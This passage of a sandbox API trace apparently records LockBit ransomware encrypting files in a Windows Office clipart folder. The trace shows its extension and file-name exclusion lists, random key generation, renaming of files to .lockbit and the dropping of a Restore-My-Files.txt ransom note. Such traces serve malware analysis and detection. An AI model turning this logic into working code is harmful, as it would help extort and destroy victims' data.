lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0116.344] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0116.345] malloc (_Size=0xa6) returned 0x77d7a8 [0116.345] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0116.346] free (_Block=0x77d7a8) [0116.346] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0116.346] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0116.346] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0116.346] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xf94, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD02116_.WMF", cAlternateFileName="")) returned 1 [0116.363] lstrcmpiW (lpString1=".", lpString2="FD02116_.WMF") returned -1 [0116.363] lstrcmpiW (lpString1="..", lpString2="FD02116_.WMF") returned -1 [0116.363] PathFindExtensionW (pszPath="FD02116_.WMF") returned=".WMF" [0116.364] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0116.364] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0116.364] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0116.364] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0116.364] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0116.364] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0116.364] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0116.364] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0116.364] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0116.364] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0116.364] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0116.364] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0116.364] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0116.364] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0116.364] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0116.365] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0116.365] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0116.366] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0116.366] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0116.366] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0116.366] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0116.366] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0116.366] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0116.366] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0116.366] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0116.366] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD02116_.WMF") returned 1 [0116.366] lstrcmpiW (lpString1="ntldr", lpString2="FD02116_.WMF") returned 1 [0116.366] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD02116_.WMF") returned 1 [0116.366] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD02116_.WMF") returned -1 [0116.366] lstrcmpiW (lpString1="autorun.inf", lpString2="FD02116_.WMF") returned -1 [0116.366] lstrcmpiW (lpString1="thumbs.db", lpString2="FD02116_.WMF") returned 1 [0116.366] lstrcmpiW (lpString1="iconcache.db", lpString2="FD02116_.WMF") returned 1 [0116.366] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0116.366] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned=".WMF" [0116.366] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0116.366] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0116.367] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0116.367] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0116.367] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0116.367] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0116.367] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0116.367] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0116.367] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0116.367] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0116.367] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0116.367] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0116.367] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0116.367] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0116.367] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0116.367] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0116.367] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0116.367] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0116.368] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0116.368] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0116.368] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0116.368] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0116.368] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0116.368] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0116.368] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0116.368] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0116.368] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0116.368] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0116.368] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF.lockbit") returned 72 [0116.368] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02116_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0116.369] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0116.369] malloc (_Size=0x40068) returned 0x1ff1e60 [0116.369] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3988) returned 1 [0116.369] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.370] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0116.370] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.370] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0116.370] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0116.392] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0116.392] malloc (_Size=0xa6) returned 0x77d7a8 [0116.392] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0116.393] free (_Block=0x77d7a8) [0116.393] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0116.393] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0116.393] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0116.393] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x52290670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD02141_.WMF", cAlternateFileName="")) returned 1 [0116.393] lstrcmpiW (lpString1=".", lpString2="FD02141_.WMF") returned -1 [0116.393] lstrcmpiW (lpString1="..", lpString2="FD02141_.WMF") returned -1 [0116.394] PathFindExtensionW (pszPath="FD02141_.WMF") returned=".WMF" [0116.394] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0116.394] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0116.395] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0116.395] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0116.396] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0116.396] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0116.396] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0116.396] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD02141_.WMF") returned 1 [0116.396] lstrcmpiW (lpString1="ntldr", lpString2="FD02141_.WMF") returned 1 [0116.396] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD02141_.WMF") returned 1 [0116.396] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD02141_.WMF") returned -1 [0116.396] lstrcmpiW (lpString1="autorun.inf", lpString2="FD02141_.WMF") returned -1 [0116.396] lstrcmpiW (lpString1="thumbs.db", lpString2="FD02141_.WMF") returned 1 [0116.396] lstrcmpiW (lpString1="iconcache.db", lpString2="FD02141_.WMF") returned 1 [0116.396] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0116.396] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned=".WMF" [0116.396] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0116.396] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0116.396] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0116.396] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0116.396] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0116.396] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0116.396] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0116.396] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0116.396] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0116.396] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0116.396] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0116.397] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0116.397] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0116.397] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0116.397] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0116.397] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0116.397] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0116.397] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0116.397] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0116.397] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0116.397] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0116.397] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0116.397] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0116.397] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0116.397] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0116.397] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0116.397] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0116.397] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0116.397] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF.lockbit") returned 72 [0116.397] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02141_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0116.402] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0116.402] malloc (_Size=0x40068) returned 0x3d70450 [0116.402] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=2636) returned 1 [0116.402] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.403] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0116.403] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.403] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0116.403] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0116.444] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0116.444] malloc (_Size=0xa6) returned 0x77d7a8 [0116.445] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0116.446] free (_Block=0x77d7a8) [0116.446] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0116.446] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0116.446] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0116.446] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1510, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD02153_.WMF", cAlternateFileName="")) returned 1 [0116.446] lstrcmpiW (lpString1=".", lpString2="FD02153_.WMF") returned -1 [0116.446] lstrcmpiW (lpString1="..", lpString2="FD02153_.WMF") returned -1 [0116.446] PathFindExtensionW (pszPath="FD02153_.WMF") returned=".WMF" [0116.446] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0116.446] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0116.446] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0116.446] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0116.446] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0116.446] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0116.446] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0116.446] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0116.446] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0116.446] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0116.447] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0116.447] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0116.448] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0116.448] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0116.448] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0116.448] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0116.448] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0116.448] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0116.448] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0116.448] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0116.448] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0116.448] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0116.448] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0116.448] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD02153_.WMF") returned 1 [0116.448] lstrcmpiW (lpString1="ntldr", lpString2="FD02153_.WMF") returned 1 [0116.448] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD02153_.WMF") returned 1 [0116.448] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD02153_.WMF") returned -1 [0116.448] lstrcmpiW (lpString1="autorun.inf", lpString2="FD02153_.WMF") returned -1 [0116.448] lstrcmpiW (lpString1="thumbs.db", lpString2="FD02153_.WMF") returned 1 [0116.448] lstrcmpiW (lpString1="iconcache.db", lpString2="FD02153_.WMF") returned 1 [0116.448] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft 